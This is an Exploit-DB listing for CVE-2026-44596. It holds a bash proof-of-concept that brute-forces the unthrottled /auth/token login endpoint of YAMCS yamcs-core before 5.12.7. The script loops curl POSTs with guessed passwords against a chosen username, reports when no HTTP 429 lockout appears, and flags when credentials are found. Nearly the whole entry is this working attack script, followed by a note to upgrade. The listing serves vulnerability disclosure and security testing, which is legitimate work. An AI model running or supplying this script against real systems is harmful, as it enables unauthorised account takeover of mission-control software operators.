YAMCS yamcs-core 5.12.7 - No Rate Limiting

EDB-ID:

52605

CVE:

2026-44596

EDB Verified:

Author:

Daniel Miranda

Type:

webapps

Exploit:   /  

Platform:

Multiple

Date:

2026-05-30

Vulnerable App: 
# Exploit Title: YAMCS yamcs-core  5.12.7 - No Rate Limiting 
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-44596
# Category: Remote / Brute Force
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-w5r6-mcgq-7pq4

#!/bin/bash
# ============================================================
# CVE-2026-44596 — YAMCS No Rate Limiting on /auth/token
# ============================================================
# Vulnerability: POST /auth/token accepts unlimited login
#                attempts with no rate limiting or lockout.
# Impact:        Unauthenticated brute-force of any account.
# Affected:      yamcs-core < 5.12.7
# Fixed in:      yamcs-core 5.12.7
# CWE:           CWE-307
# CVSS:          5.3 MEDIUM
# ============================================================
# Usage: ./poc.sh [target] [username] [attempts]
# Example: ./poc.sh http://localhost:8090 operator 20
# ============================================================

TARGET="${1:-http://localhost:8090}"
USERNAME="${2:-operator}"
ATTEMPTS="${3:-20}"
LAST_STATUS=""

echo "============================================================"
echo " CVE-2026-44596 — YAMCS No Rate Limiting PoC"
echo " Target:   $TARGET"
echo " Username: $USERNAME"
echo " Attempts: $ATTEMPTS"
echo "============================================================"
echo ""
echo "[*] Sending $ATTEMPTS unauthenticated login attempts..."
echo "[*] Vulnerable: HTTP 401 every time, never HTTP 429"
echo ""

for i in $(seq 1 $ATTEMPTS); do
    RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" \
        -X POST "$TARGET/auth/token" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -d "grant_type=password&username=$USERNAME&password=wrongpass$i")

    echo "  Attempt $i/$ATTEMPTS: HTTP $RESPONSE"
    LAST_STATUS=$RESPONSE

    if [ "$RESPONSE" = "429" ]; then
        echo ""
        echo "[+] HTTP 429 received — rate limiting active (PATCHED)"
        exit 0
    fi

    if [ "$RESPONSE" = "200" ]; then
        echo ""
        echo "[!!!] HTTP 200 — credentials found at attempt $i"
        exit 0
    fi
done

echo ""
if [ "$LAST_STATUS" = "401" ]; then
    echo "[!!!] VULNERABLE: $ATTEMPTS attempts, no rate limiting detected"
    echo "[!!!] Brute-force possible without restriction"
fi

echo ""
echo "============================================================"
echo " Fix: Upgrade to yamcs-core >= 5.12.7"
echo "============================================================"
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services